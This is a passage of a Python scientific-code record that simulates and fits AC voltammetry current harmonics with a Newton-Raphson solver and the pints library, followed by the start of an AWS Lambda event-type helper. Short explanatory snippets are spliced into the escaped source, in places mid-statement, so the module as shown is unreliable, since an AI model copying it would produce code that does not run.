self.gamma4 = (cap_params[4]*non_dimensiosation_constant)\n self.gamma5 = (cap_params[5]*self.E0)*non_dimensiosation_constant\n self.gamma6 = (cap_params[6]*math.pow(self.E0,2.0))*non_dimensiosation_constant\n self.gamma7 = (cap_params[7]*math.pow(self.E0,3.0))*non_dimensiosation_constant\n self.omega = (cap_params[8])*self.T0\n\n\n def solve(self, times: float64):\n '''Steps through and solves the system\n '''\n t = times[1:]\n # non dimensioanless times\n t=t/self.T0\n # specifying initial values of the following\n self.theta_X[0] = self.theta_X_Initial\n self.theta_Z[0] = self.theta_Z_Initial\n self.i[0] = self.I_inital/self.I0\n # calculating initial differentials\n # these aren't used they are just\n # calculated for completeness\n self.find_dtheta_X_dt(0)\n self.find_dtheta_Z_dt(0)\n index = 1\n for time in t:\n self.find_epsilon(time, index)\n # calculate both theta values at next time step (time)\n self.backwards_euler(index)\n # cacluate differentials\n self.find_dtheta_X_dt(index)\n self.find_dtheta_Z_dt(index)\n # finding current at next time step\n self.newton_raphson(time, index)\n index = index + 1\n\n return self.i\n\nclass wrappedNewton(pints.ForwardModel):\n def __init__(self, times: float, inital_current: float = 6.620541e-07, freq: float = 8.95931721948, startPotential: float = -0.15, revPotential: float = -0.75,\n rateOfPotentialChange: float = -22.35e-3, deltaepislon: float = 150E-3, uncomp_resis: float = 27.160770551,\n electrode_area: float = 0.03, electode_coverage: float = 6.5e-12,initaldiscard: float = 0.025, enddiscard: float = 0.875,\n cap_params: tuple = (1.13465158675681913e-04, 1.71228672908262905e-06, -2.02632468231267758e-05, -6.41028656277626023e-05,\n 1.13465158675681913e-04, 1.71228672908262905e-06, -2.02632468231267758e-05, -6.41028656277626023e-05, -6.47083954113886932e+01)):\n\n self.inital_current = inital_current\n self.freq = freq\n self.startPotential = startPotential\n self.revPotential = revPotential\n self.rateOfPotentialChange = rateOfPotentialChange\n length = times.shape\n self.numberOfMeasurements = int(length[0])\n self.half_of_measuremnts = 
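# backwards_euler() above advances theta_X and theta_Z by writing the implicit
# step as a 2x2 linear system and handing it to np.linalg.solve. The same
# pattern on a generic linear ODE dy/dt = A @ y (A and dt are illustrative):
import numpy as np

A = np.array([[-3.0, 1.0], [2.0, -4.0]])
y = np.array([1.0, 0.0])
dt = 0.01

# backward Euler: (I - dt*A) @ y_next = y_prev, solved once per step
lhs = np.eye(2) - dt * A
for _ in range(100):
    y = np.linalg.solve(lhs, y)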
math.ceil(self.numberOfMeasurements/2)\n self.deltaepislon = deltaepislon\n self.uncomp_resis = uncomp_resis\n self.electrode_area = electrode_area\n self.electode_coverage = electode_coverage\n self.initaldiscard = int(initaldiscard*self.half_of_measuremnts)\n self.enddiscard = int(enddiscard*self.half_of_measuremnts)\n\n if self.numberOfMeasurements % 2.0 == 0.0:\n\n self.potentialRange = np.linspace(startPotential, revPotential, self.numberOfMeasurements )\n reversed_potentialRange = np.flip(self.potentialRange)\n fullPotentialRange = np.hstack((self.potentialRange, reversed_potentialRange[1:]))\n self.fullPotentialRange = fullPotentialRange[::2]\n\n else:\n\n self.potentialRange = np.linspace(startPotential, revPotential, self.half_of_measuremnts)\n reversed_potentialRange = np.flip(self.potentialRange)\n self.fullPotentialRange = np.hstack((self.potentialRange, reversed_potentialRange[1:]))\n\n\n # as the first time is at 0.0s we take one of the numberOfMeasurements\n # to split total time evenly and get the most accurate timeStepSize\n self.timeStepSize = times[-1]/(self.numberOfMeasurements - 1)\n\n # capactiance parameters\n self.gamma0 = cap_params[0]\n self.gamma1 = cap_params[1]\n self.gamma2 = cap_params[2]\n self.gamma3 = cap_params[3]\n self.gamma4 = cap_params[4]\n self.gamma5 = cap_params[5]\n self.gamma6 = cap_params[6]\n self.gamma7 = cap_params[7]\n self.omega = cap_params[8]\n \n def n_outputs(self):\n \"\"\" \n See :meth:`pints.ForwardModel.n_outputs()`.\n number of outputs of the model\n \"\"\"\n # current I\n return 1\n \n def n_parameters(self):\n \"\"\" See :meth:`pints.ForwardModel.n_parameters()`. \n :return: dimensions of parameter vector\n \"\"\"\n # kappa0_1, kappa0_2, epsilon0_1, epsilon0_2, mew, zeta\n # gamma0, gamma1, gamma2, gamma3, omega\n # need to change to 11 when sensitivities have been adjusted\n return 6\n \n def _simulate(self, parameters, times, FT):\n \"\"\"\n Private helper function that uses ``scipy.integrate.odeint`` to\n simulate a model (with or without sensitivities).\n \"\"\"\n \n # ensuring time and parameters are numpy array\n # times = np.asarray(times)\n parameters = np.asarray(parameters)\n\n # creating instance of newtonRaphsonFT\n\n solver = newtonRaphsonFT(timeStepSize=self.timeStepSize, inital_current=self.inital_current, freq=self.freq, startPotential=self.startPotential,\n revPotential=self.revPotential, rateOfPotentialChange=self.rateOfPotentialChange,\n numberOfMeasurements=self.numberOfMeasurements, deltaepislon=self.deltaepislon, uncomp_resis=self.uncomp_resis,\n electrode_area=self.electrode_area, electode_coverage=self.electode_coverage)\n\n # nondimensionalsing parameters\n params= []\n params.append(parameters[0]*solver.T0) #k0_1\n params.append(parameters[1]*solver.T0) #K0_2\n params.append(parameters[2]/solver.E0) #E0_1\n params.append(parameters[3]/solver.E0) # E0_2\n params.append(parameters[4]) # phase is demnsionless\n params.append(parameters[5]*(solver.F*solver.s*solver.GAMMA/(solver.T0*solver.I0))) # zeta\n params = np.asarray(params)\n\n solver.set_faradaic_parameters(params)\n capacitance = self.get_capacitance_params()\n solver.set_capacitance_params(capacitance)\n\n # solving up to potential reversal\n # nondimensionalsing time\n #dimlessTimes = times/solver.T0\n\n # solving using newtonRaphsonFT\n i = solver.solve(times)\n\n if FT == True:\n return self.FT_and_reduce_to_harmonics_4_to_12(i)\n else:\n return i\n\n\n def simulate(self, parameters, times):\n \"\"\" See :meth:`pints.ForwardModel.simulate()`. 
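# _simulate() above nondimensionalises the fitted parameters exactly as the
# solver expects: rate constants are scaled by T0 and potentials by E0. The
# characteristic scales themselves, computed from this module's defaults:
R, T, F = 8.314, 25.0 + 273.15, 96485.3329
v = -22.35e-3                    # scan rate in V/s
s, Gamma = 0.03, 6.5e-12         # electrode area and surface coverage

E0 = R * T / F                   # thermal voltage, ~25.7 mV
T0 = E0 / v                      # characteristic time (inherits the sign of v)
I0 = F * s * Gamma / T0          # characteristic current

kappa_dimless = 3400.0 * T0      # kappa0_1 * T0, as in _simulate
epsilon_dimless = -0.437459534627 / E0  # epsilon0_1 / E0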
\"\"\"\n i = self._simulate(parameters, times, False)\n return i\n\n def simulate_raw_current(self, parameters, times):\n \n i = self._simulate(parameters, times, False)\n #only returns Fourier transformed observable parameters which is current\n #i = np.append(i, i[0])\n # I = np.asarray(i)\n return i\n\n def simulate_reduced_FT_current(self, parameters, times):\n \n FT = self._simulate(parameters, times, True)\n #only returns Fourier transformed observable parameters which is current\n #i = np.append(i, i[0])\n # I = np.asarray(i)\n return FT\n\n def suggested_parameter(self):\n \"\"\"Returns a list with suggestsed parameters for the model with dimensions\n kappa0_1 and kappa0_2 have dims s^(-1)\n epsilon0_1 and epsilon0_2 have dims V\n mew is in radians\n zeta is dimensionless\n return: [kappa0_1, kappa0_2, epsilon0_1, epsilon0_2, mew, zeta]\n \"\"\"\n # mew = -8.82407598543352156e-02 # by my fitting\n mew = -0.031244092599793216 # by paper\n return [3400.0, 3400.0, -0.437459534627, -0.46045114238, mew, 1.0]\n\n def get_capacitance_params(self):\n \"\"\"Returns a list with suggestsed capacitance parameters for the model with dimension\n return: [gamma0, gamma1, gamma2, gamma3, omega]\n \"\"\"\n return [self.gamma0, self.gamma1, self.gamma2, self.gamma3,\n self.gamma4, self.gamma5, self.gamma6, self.gamma7, self.omega]\n\n def get_non_dimensionality_constants(self):\n \"\"\" Helper function to obtain the non dimensionality constants from the base Python class\n\n Returns:\n list: contains the non dimenstality constants [E0, T0, I0]\n \"\"\"\n\n solver = newtonRaphsonFT(timeStepSize=self.timeStepSize, inital_current=self.inital_current, freq=self.freq, startPotential=self.startPotential,\n revPotential=self.revPotential, rateOfPotentialChange=self.rateOfPotentialChange, numberOfMeasurements=self.numberOfMeasurements,\n deltaepislon=self.deltaepislon, uncomp_resis=self.uncomp_resis, electrode_area=self.electrode_area,\n electode_coverage=self.electode_coverage)\n\n return [solver.E0, solver.T0, solver.I0]\n\n def FT_and_reduce_to_harmonics_4_to_12(self, Data):\n \"\"\"Fourier transforms given data and reduces it to harmonics 3 to 12\n\n param: Data data to Fourier transform and reduce\n return: numpy array contain fourier transformed data for harmonics 3 -12\n \"\"\"\n sp = np.fft.fft(Data)\n #sp = sp/(self.numberOfMeasurements*2) # as FFT scales by number of measurements to make inverse easy\n #sp = np.abs(sp) # combining real and imaginary parts\n #sp = 2*sp # doubling amplitudes as it is split between -ve and +ve frequencies and we are going to discard negative frequencies\n sp = sp[:self.half_of_measuremnts] #discarding -ve frequencies\n output = sp[self.initaldiscard:self.half_of_measuremnts - self.enddiscard] # reducing to harmonics 4 - 12\n output = np.asarray(output)\n return output\n\n def frequencies_for_harmonics_4_to_12(self, times):\n \"\"\"Fourier transforms given data and reduces it to harmonics 3 to 12\n\n param: Data data to Fourier transform and reduce\n return: numpy array contain fourier transformed data for harmonics 3 -12\n \"\"\"\n freq_org = np.fft.fftfreq(times.shape[0], d= self.timeStepSize)\n freq=freq_org[:self.half_of_measuremnts]\n freq = freq[self.initaldiscard:self.half_of_measuremnts - self.enddiscard] # reducing to harmonics 4 - 12\n return freq\n \n def harmonic_spacing(self, experimental_data, exp_times, adjustment: int = 0):\n \"\"\"caculates the spacing between individual harmonics of the FT current\n\n Args:\n experimental_data (numpy array , float): 
experimental currents \n exp_times (numpy array , float): experimental times corresponding to current measurements\n\n Returns:\n int: index of the highest magnitude peak of Fourier transformation i.e the peak of the first harmonic\n \"\"\"\n\n full_sim = np.fft.fft(experimental_data)\n half_full_sim = full_sim[:self.half_of_measuremnts]\n\n freq_org = np.fft.fftfreq(exp_times.shape[0], d= self.timeStepSize)\n freq_org=freq_org[:self.half_of_measuremnts]\n\n x = np.where(freq_org < self.freq)\n print('x[0][-1]: ', x[0][-1])\n spacing = x[0][-1]\n\n y = np.where(freq_org > self.freq)\n print('y[0][0]: ', y[0][0])\n\n z = np.where(freq_org == self.freq)\n print('z[0]: ', z[0])\n\n low = spacing - 80\n upper = spacing + 80\n\n if exp_times is not None:\n xaxislabel = \"frequency/Hz\" # \"potential/V\"\n\n plt.figure()\n plt.title(\"experimental FT\")\n plt.ylabel(\"amplituide\")\n plt.xlabel(xaxislabel)\n plt.plot(freq_org, np.log10(half_full_sim),'royalblue', label='experimental_data')\n plt.plot(freq_org[low:upper], np.log10(half_full_sim[low:upper]),'r', label='experimental_harmonic 1')\n f = mtick.ScalarFormatter(useOffset=False, useMathText=True)\n g = lambda x,pos : \"${}$\".format(f._formatSciNotation('%1.10e' % x))\n plt.gca().yaxis.set_major_formatter(mtick.FuncFormatter(g))\n plt.legend(loc='best', markerscale = 0.1, labelspacing = 0.1, handlelength = 0.5, columnspacing = 0.1, borderaxespad = 0.1, handletextpad = 0.4, borderpad = 0.2)\n plt.show()\n plt.close('all')\n\n spacing_x = x[0][-1] +adjustment\n spacing_y = y[0][0] +adjustment\n\n plt.figure()\n plt.title(\"experimental FT harmonic 1 and mid point (max)\")\n plt.ylabel(\"amplituide\")\n plt.xlabel(xaxislabel)\n plt.plot(freq_org[low:upper], np.log10(half_full_sim[low:upper]),'r', label='experimental_harmonic 1')\n plt.plot(freq_org[spacing_x], np.log10(half_full_sim[spacing_x]),'kX', label='spacing_x')\n plt.plot(freq_org[spacing_y], np.log10(half_full_sim[spacing_y]),'yX', label='spacing_y')\n if z[0] is not None:\n spacing_z =z[0]\n plt.plot(freq_org[spacing_z], np.log10(half_full_sim[spacing_z]),'cX', label='spacing_z')\n f = mtick.ScalarFormatter(useOffset=False, useMathText=True)\n g = lambda x,pos : \"${}$\".format(f._formatSciNotation('%1.10e' % x))\n plt.gca().yaxis.set_major_formatter(mtick.FuncFormatter(g))\n plt.legend(loc='best', markerscale = 0.1, labelspacing = 0.1, handlelength = 0.5, columnspacing = 0.1, borderaxespad = 0.1, handletextpad = 0.4, borderpad = 0.2)\n plt.show()\n plt.close('all')\n\n # plt.figure(figsize=(18,10))\n # plt.title(\"experimental FT\")\n # plt.ylabel(\"amplituide\")\n # plt.xlabel(xaxislabel)\n # plt.plot(freq_org, np.log10(half_full_sim),'royalblue', label='experimental_data')\n # freq = self.frequencies_for_harmonics_4_to_12(times =exp_times)\n # Ft_reduced_sim = self.simulate_reduced_FT_current(parameters= [4.00000000000000000e+03, 3.99999999971199850e+03,\n # -3.42625240890104044e-01, -3.32825431395151972e-01,\n # -1.37555866965690110e-02, 4.84787412952000452e-01], times = exp_times)\n # plt.plot(freq, np.log10(Ft_reduced_sim),'r', label='experimental_harmonics 4- 12')\n # plt.legend(loc='best', markerscale = 0.1, labelspacing = 0.1, handlelength = 0.5, columnspacing = 0.1, borderaxespad = 0.1, handletextpad = 0.4, borderpad = 0.2)\n # plt.show()\n\n # plt.figure(figsize=(18,10))\n # plt.title(\"experimental FT\")\n # plt.ylabel(\"amplituide\")\n # plt.xlabel(xaxislabel)\n # plt.plot(freq, np.log10(Ft_reduced_sim),'r', label='experimental_harmonics 4- 12')\n # 
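# harmonic_spacing() above locates the fundamental by comparing the FFT
# frequency axis against the driving frequency. The core lookup, assuming a
# toy sampling grid and this module's ~8.96 Hz drive:
import numpy as np

n, dt = 100000, 1e-4
freqs = np.fft.fftfreq(n, d=dt)[: n // 2]
drive = 8.95931721948

below = np.where(freqs < drive)[0][-1]  # last bin below the drive frequency
above = np.where(freqs > drive)[0][0]   # first bin above it
spacing = below                         # bins between successive harmonics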
plt.legend(loc='best', markerscale = 0.1, labelspacing = 0.1, handlelength = 0.5, columnspacing = 0.1, borderaxespad = 0.1, handletextpad = 0.4, borderpad = 0.2)\n # plt.show()\n\n # change as approriate\n # was orginally -1\n return int(spacing_x)\n\n def index_distance_covering(self, Hz_interval, exp_times):\n \"\"\"number of indexs needed to span the frequency interval Hz_interal\n\n Args:\n Hz_interval (float): Hz interval desried to cut of harmonics around\n exp_times (numpy array , float): experimental times corresponding to current measurements\n\n Returns:\n float: number of frequency steps (indexs) spaning the Hz interval \n \"\"\"\n\n freq_org = np.fft.fftfreq(exp_times.shape[0], d= exp_times[1])\n\n return Hz_interval/freq_org[1]\n\n\n def ploting_harmonic(self, experimental_data, times, parameter_for_sim, print_these_harmonics = None, Hz_interval = 1.5, print_harmonics = True,\n check_FT_harmonic_locations = False, print_all_harmonics = True, print_simulated_harmonics_alone = False, save_to = None, FirstAdjustment: int = -1,\n FourthAdjustment: int = -4):\n \"\"\"ploting harmonics of data against simulated harmonics\n\n Args:\n experimental_data (numpy array): experimental data\n times (numpy array): times for simulation\n parameter_for_sim (numpy array): [kappa0_1, kappa0_2, epsilon0_1, epsilon0_2, mew, zeta]\n \"\"\"\n\n FT_reduced_exp = self.FT_and_reduce_to_harmonics_4_to_12(experimental_data)\n Ft_reduced_sim = self.simulate_reduced_FT_current(parameters= parameter_for_sim, times = times)\n\n freq = self.frequencies_for_harmonics_4_to_12(times =times)\n\n # 4th harmonic centered at 303\n # should be seprated by ~ 480 measurements\n print('*'*10+'cacluating harmonic spacing'+'*'*10)\n spacing = self.harmonic_spacing(experimental_data, times, adjustment= FirstAdjustment)\n print('Spacing between harmonics: ', spacing)\n\n # FIXME: issue finding location of 4th harmonic mid point\n print('\\n'+'*'*10+'cacluating location of 4th harmonic'+'*'*10)\n x = np.where(freq < self.freq*4)\n print('x: ', x[0][-1])\n mid_point_index = x[0][-1] + FourthAdjustment\n print('mid point index of 4th harmonic: ', mid_point_index)\n print('\\n'+'*'*10+'index distance of ' + str(Hz_interval) + 'Hz'+'*'*10)\n index_window = self.index_distance_covering(Hz_interval, times)\n print('index window covering ' + str(Hz_interval) + 'Hz: ', index_window)\n index_window = np.round(index_window)\n print('int index window covering ' + str(Hz_interval) + 'Hz: ', index_window)\n\n\n if check_FT_harmonic_locations is True:\n self._ploting_FT_haromics(mid_point_index, index_window, spacing, freq, Ft_reduced_sim, FT_reduced_exp,\n print_simulated_harmonics_alone, print_all_harmonics, print_these_harmonics)\n \n if print_harmonics is True:\n dims = freq.shape\n self._ploting_ifft_haromics(mid_point_index, index_window, spacing, dims, Ft_reduced_sim, FT_reduced_exp,\n print_simulated_harmonics_alone, print_all_harmonics, print_these_harmonics, save_to)\n\n\n\n def _ploting_ifft_haromics(self, mid_point_index, index_window, spacing, dims, Ft_reduced_sim, FT_reduced_exp,\n print_simulated_harmonics_alone, print_all_harmonics, print_these_harmonics, save_to):\n\n harmonic = 4\n low = int(mid_point_index - index_window)\n high = int(mid_point_index+ index_window + 1)\n mid = int(mid_point_index)\n\n temp = self.get_non_dimensionality_constants()\n\n I0 = temp[2]\n \n while high <= dims[0]:\n sim_plot = Ft_reduced_sim[low:high]\n # kaiser_window = np.kaiser(sim_plot.shape[0], 0)\n # array_for_iFFT = 
np.multiply(kaiser_window,array_for_iFFT)\n\n # plt.figure(figsize=(18,10))\n # plt.title(\"kaiser_window\")\n # plt.ylabel(\"?\")\n # plt.plot(kaiser_window,'r', linestyle='dashed', label='kaiser_window')\n # plt.tick_params(\n # axis='x', # changes apply to the x-axis\n # which='both', # both major and minor ticks are affected\n # bottom=False, # ticks along the bottom edge are off\n # top=False, # ticks along the top edge are off\n # labelbottom=False) \n # plt.legend(loc='best', markerscale = 0.1, labelspacing = 0.1, handlelength = 0.5, columnspacing = 0.1, borderaxespad = 0.1, handletextpad = 0.4, borderpad = 0.2)\n # plt.show()\n\n print('sim_plot.shape: ', sim_plot.shape)\n temp = sim_plot.shape[0]*6 # 300 # int(10*harmonic) # sim_plot.shape[0]\n print('number added to each half of array: ', temp)\n mid_upper_sim_plot = Ft_reduced_sim[mid:high]\n mid_upper_sim_plot = np.hstack((mid_upper_sim_plot, np.zeros(temp)))\n lower_sim_plot = Ft_reduced_sim[low:mid]\n lower_sim_plot = np.hstack((np.zeros(temp), lower_sim_plot))\n \n array_for_iFFT = np.hstack((mid_upper_sim_plot, lower_sim_plot))\n sim_harmonic = np.fft.ifft(array_for_iFFT)\n sim_harmonic = sim_harmonic*I0\n\n sim_plot = FT_reduced_exp[low:high]\n mid_upper_sim_plot = FT_reduced_exp[mid:high]\n mid_upper_sim_plot = np.hstack((mid_upper_sim_plot, np.zeros(temp)))\n lower_sim_plot = FT_reduced_exp[low:mid]\n lower_sim_plot = np.hstack((np.zeros(temp), lower_sim_plot))\n array_for_iFFT = np.hstack((mid_upper_sim_plot, lower_sim_plot))\n exp_harmonic = np.fft.ifft(array_for_iFFT)\n exp_harmonic = exp_harmonic*I0\n\n # cacluating times and dc potential for harmonic matrices\n for_calc = sim_harmonic.shape[0]\n startT = 0.0#specify in seconds\n revT = abs((self.revPotential - self.startPotential)/(self.rateOfPotentialChange))\n endT = revT*2.0\n\n if for_calc % 2.0 == 0.0:\n for_calc = int(for_calc)\n\n first_half_times = np.linspace(startT, revT, for_calc)\n last_half_times = np.linspace(revT, endT, for_calc)\n IFFT_time = np.hstack((first_half_times, last_half_times[1:]))\n IFFT_time = IFFT_time[::2]\n\n potentialRange = np.linspace(self.startPotential, self.revPotential, for_calc)\n reversed_potentialRange = np.flip(potentialRange)\n IFFT_fullPotentialRange = np.hstack((potentialRange, reversed_potentialRange[1:]))\n IFFT_fullPotentialRange = IFFT_fullPotentialRange[::2]\n\n if print_all_harmonics is True or harmonic in print_these_harmonics:\n output = np.vstack((IFFT_time, IFFT_fullPotentialRange))\n headers = ['time/s', 'potential/V']\n output = np.vstack((output, np.absolute(exp_harmonic)))\n headers.append('experimental/A')\n output = np.vstack((output, np.absolute(sim_harmonic)))\n headers.append('optimised/A')\n output = np.transpose(output)\n pd.DataFrame(output).to_csv(os.path.join(save_to, 'absolute_harmonic_'+str(harmonic)+'.txt'), header=headers, index=None, sep='\\t')\n del(output)\n\n else:\n for_calc = math.ceil(for_calc/2)\n\n first_half_times = np.linspace(startT, revT, for_calc)\n last_half_times = np.linspace(revT, endT, for_calc)\n IFFT_time = np.hstack((first_half_times, last_half_times[1:]))\n\n potentialRange = np.linspace(self.startPotential, self.revPotential, for_calc)\n reversed_potentialRange = np.flip(potentialRange)\n IFFT_fullPotentialRange = np.hstack((potentialRange, reversed_potentialRange[1:]))\n\n if print_all_harmonics is True or harmonic in print_these_harmonics:\n output = np.vstack((IFFT_time, IFFT_fullPotentialRange))\n headers = ['time/s', 'potential/V']\n output = np.vstack((output, 
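# The block above isolates a single harmonic: the spectrum around the
# harmonic's centre bin is split at the centre, zero-padded, reassembled in
# FFT order (positive half first) and inverse-transformed. A compact sketch
# of the same manoeuvre; bin numbers and pad lengths here are illustrative:
import numpy as np

def isolate_band(spectrum, mid, half_width, pad):
    upper = np.hstack((spectrum[mid:mid + half_width + 1], np.zeros(pad)))
    lower = np.hstack((np.zeros(pad), spectrum[mid - half_width:mid]))
    return np.fft.ifft(np.hstack((upper, lower)))

n = 4096
t = np.linspace(0.0, 1.0, n)
sig = np.sin(2 * np.pi * 40 * t) + 0.2 * np.sin(2 * np.pi * 80 * t)
sp = np.fft.fft(sig)[: n // 2]
second_harmonic = isolate_band(sp, mid=80, half_width=5, pad=200)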
np.absolute(exp_harmonic)))\n headers.append('experimental/A')\n output = np.vstack((output, np.absolute(sim_harmonic)))\n headers.append('optimised/A')\n output = np.transpose(output)\n pd.DataFrame(output).to_csv(os.path.join(save_to, 'absolute_harmonic_'+str(harmonic)+'.txt'), header=headers, index=None, sep='\\t')\n del(output)\n\n\n\n\n if print_simulated_harmonics_alone is True:\n \n if print_all_harmonics is True or harmonic in print_these_harmonics:\n plt.figure()\n plt.title(\"Simulated Harmonic \"+ str(harmonic))\n plt.ylabel(\"Current/Dimensionless\")\n plt.plot(IFFT_time, sim_harmonic.real,'r', label='Real')\n plt.plot(IFFT_time, sim_harmonic.imag,'r', linestyle='dashed', label='Imaginary')\n f = mtick.ScalarFormatter(useOffset=False, useMathText=True)\n g = lambda x,pos : \"${}$\".format(f._formatSciNotation('%1.10e' % x))\n plt.gca().yaxis.set_major_formatter(mtick.FuncFormatter(g))\n plt.legend(loc='best', markerscale = 0.1, labelspacing = 0.1, handlelength = 0.5, columnspacing = 0.1, borderaxespad = 0.1, handletextpad = 0.4, borderpad = 0.2)\n if save_to is not None:\n plt.savefig(os.path.join(save_to, 'Just_simulated_harmonic_' + str(harmonic)+'.png'), transparent=True, bbox_inches='tight')\n # plt.show()\n plt.close('all')\n\n if print_all_harmonics is True or harmonic in print_these_harmonics:\n\n plt.figure()\n plt.title(\"Harmonic \"+ str(harmonic))\n plt.ylabel(\"Current/Dimensionless\")\n plt.plot(IFFT_time, exp_harmonic.real,'royalblue', label='Real Exp')\n plt.plot(IFFT_time, sim_harmonic.real,'r', label='Real Best Fit')\n plt.plot(IFFT_time, exp_harmonic.imag,'royalblue', linestyle='dashed', label='Imaginary Exp')\n plt.plot(IFFT_time, sim_harmonic.imag,'r', linestyle='dashed', label='Imaginary Best Fit')\n f = mtick.ScalarFormatter(useOffset=False, useMathText=True)\n g = lambda x,pos : \"${}$\".format(f._formatSciNotation('%1.10e' % x))\n plt.gca().yaxis.set_major_formatter(mtick.FuncFormatter(g))\n plt.legend(loc='best', markerscale = 0.1, labelspacing = 0.1, handlelength = 0.5, columnspacing = 0.1, borderaxespad = 0.1, handletextpad = 0.4, borderpad = 0.2)\n if save_to is not None:\n plt.savefig(os.path.join(save_to, 'Simulated_on_experimental_harmonic_'+str(harmonic)+'.png'), transparent=True, bbox_inches='tight')\n # plt.show()\n plt.close('all')\n\n plt.figure()\n plt.title(\"Absolute Harmonic \"+ str(harmonic))\n plt.ylabel(\"Current/Dimensionless\")\n plt.plot(IFFT_time, np.absolute(exp_harmonic),'royalblue', label='Exp')\n plt.plot(IFFT_time, np.absolute(sim_harmonic),'r', linestyle='dashdot', label='Best Fit')\n plt.legend(loc='best', markerscale = 0.1, labelspacing = 0.1, handlelength = 0.5, columnspacing = 0.1, borderaxespad = 0.1, handletextpad = 0.4, borderpad = 0.2)\n f = mtick.ScalarFormatter(useOffset=False, useMathText=True)\n g = lambda x,pos : \"${}$\".format(f._formatSciNotation('%1.10e' % x))\n plt.gca().yaxis.set_major_formatter(mtick.FuncFormatter(g))\n if save_to is not None:\n plt.savefig(os.path.join(save_to, 'Absolute_simulated_on_experimental_harmonic_'+str(harmonic)+'.png'), transparent=True, bbox_inches='tight')\n # plt.show()\n plt.close('all')\n\n\n high = high+spacing\n low = low+spacing\n mid = mid+spacing\n harmonic = harmonic +1\n \n \n\n def _ploting_FT_haromics(self, mid_point_index, index_window, spacing, freq, Ft_reduced_sim, FT_reduced_exp,\n print_simulated_harmonics_alone, print_all_harmonics, print_these_harmonics):\n \n dims = freq.shape\n \n harmonic = 4\n low = int(mid_point_index - index_window)\n high = 
int(mid_point_index+ index_window + 1)\n mid = int(mid_point_index)\n\n while high <= dims[0]:\n sim_plot = Ft_reduced_sim[low:high]\n mid_upper_sim_plot = Ft_reduced_sim[mid:high]\n lower_sim_plot = Ft_reduced_sim[low:mid]\n print('sim_plot.shape:', sim_plot.shape)\n print('mid_upper_sim_plot.shape:', mid_upper_sim_plot.shape)\n print('lower_sim_plot.shape:', lower_sim_plot.shape)\n xaxis = freq[low:high] #model.potentialRange\n xaxis_mid_upper = freq[mid:high]\n xaxis_lower= freq[low:mid]\n xaxislabel = \"freq/Hz\" # \"potential/V\"\n\n exp_plot = FT_reduced_exp[low:high]\n mid_upper_exp_plot = FT_reduced_exp[mid:high]\n lower_exp_plot = FT_reduced_exp[low:mid]\n\n if print_all_harmonics is True or harmonic in print_these_harmonics:\n plt.figure()\n plt.title(\"simulation FT\")\n plt.ylabel(\"amplituide\")\n plt.xlabel(xaxislabel)\n plt.plot(xaxis, np.log10(sim_plot),'r', label='simulated_harmonic_'+str(harmonic))\n plt.plot(xaxis_mid_upper[1:], np.log10(mid_upper_sim_plot[1:]),'k', label='simulated_harmonic_'+str(harmonic)+'_upper_1/2')\n plt.plot(xaxis_lower, np.log10(lower_sim_plot),'m', label='simulated_harmonic_'+str(harmonic)+'_lower_1/2')\n plt.plot(freq[mid], np.log10(Ft_reduced_sim[mid]),'cX', label='harmonic_center')\n plt.tick_params(\n axis='x', # changes apply to the x-axis\n which='both', # both major and minor ticks are affected\n bottom=False, # ticks along the bottom edge are off\n top=False, # ticks along the top edge are off\n labelbottom=False)\n f = mtick.ScalarFormatter(useOffset=False, useMathText=True)\n g = lambda x,pos : \"${}$\".format(f._formatSciNotation('%1.10e' % x))\n plt.gca().yaxis.set_major_formatter(mtick.FuncFormatter(g))\n plt.legend(loc='best', markerscale = 0.1, labelspacing = 0.1, handlelength = 0.5, columnspacing = 0.1, borderaxespad = 0.1, handletextpad = 0.4, borderpad = 0.2)\n plt.show()\n\n plt.figure()\n plt.title(\"experimental FT\")\n plt.ylabel(\"amplituide\")\n plt.xlabel(xaxislabel)\n plt.plot(xaxis, np.log10(exp_plot),'r', label='experimental_harmonic_'+str(harmonic))\n plt.plot(xaxis_mid_upper[1:], np.log10(mid_upper_exp_plot[1:]),'k', label='experimental_harmonic_'+str(harmonic)+'_upper_1/2')\n plt.plot(xaxis_lower, np.log10(lower_exp_plot),'m', label='experimental_harmonic_'+str(harmonic)+'_lower_1/2')\n plt.plot(freq[mid], np.log10(FT_reduced_exp[mid]),'cX', label='harmonic_center')\n plt.tick_params(\n axis='x', # changes apply to the x-axis\n which='both', # both major and minor ticks are affected\n bottom=False, # ticks along the bottom edge are off\n top=False, # ticks along the top edge are off\n labelbottom=False)\n f = mtick.ScalarFormatter(useOffset=False, useMathText=True)\n g = lambda x,pos : \"${}$\".format(f._formatSciNotation('%1.10e' % x))\n plt.gca().yaxis.set_major_formatter(mtick.FuncFormatter(g))\n plt.legend(loc='best', markerscale = 0.1, labelspacing = 0.1, handlelength = 0.5, columnspacing = 0.1, borderaxespad = 0.1, handletextpad = 0.4, borderpad = 0.2)\n plt.show()\n\n plt.figure()\n plt.title(\"simulation and experimental FT\")\n plt.ylabel(\"amplituide\")\n plt.xlabel(xaxislabel)\n plt.plot(freq, np.log10(FT_reduced_exp),'royalblue', label='experimental_data')\n plt.plot(xaxis, np.log10(sim_plot),'r', label='simulated_harmonic_'+str(harmonic))\n plt.tick_params(\n axis='x', # changes apply to the x-axis\n which='both', # both major and minor ticks are affected\n bottom=False, # ticks along the bottom edge are off\n top=False, # ticks along the top edge are off\n labelbottom=False)\n f = 
mtick.ScalarFormatter(useOffset=False, useMathText=True)\n g = lambda x,pos : \"${}$\".format(f._formatSciNotation('%1.10e' % x))\n plt.gca().yaxis.set_major_formatter(mtick.FuncFormatter(g))\n plt.legend(loc='best', markerscale = 0.1, labelspacing = 0.1, handlelength = 0.5, columnspacing = 0.1, borderaxespad = 0.1, handletextpad = 0.4, borderpad = 0.2)\n plt.show()\n\n\n high = high+spacing\n low = low+spacing\n mid = mid+spacing\n harmonic = harmonic +1","sub_path":"Newton_model_numba.py","file_name":"Newton_model_numba.py","file_ext":"py","file_size_in_byte":49619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"529901826","text":"import base64\nimport json\n\n\ndef enum(**enums):\n return type('Enum', (), enums)\n\n\nEventType = enum(\n UNKNOWN=\"unknown\",\n KINESIS=\"kinesis\",\n SNS=\"sns\",\n DYNAMODB=\"dynamodb\"\n)\n\n\ndef get_event_type(event):\n if 'Records' in event:\n # stream like events\n records = event['Records']\n\n if len(records) == 0:\n return EventType.UNKNOWN\n\n record = records[0]\n\n if 'kinesis' in record:\n return EventType.KINESIS\n\n if 'Sns' in record:\n return EventType.SNS\n\n if 'dynamodb' in record:\n return EventType.DYNAMODB\n\n return 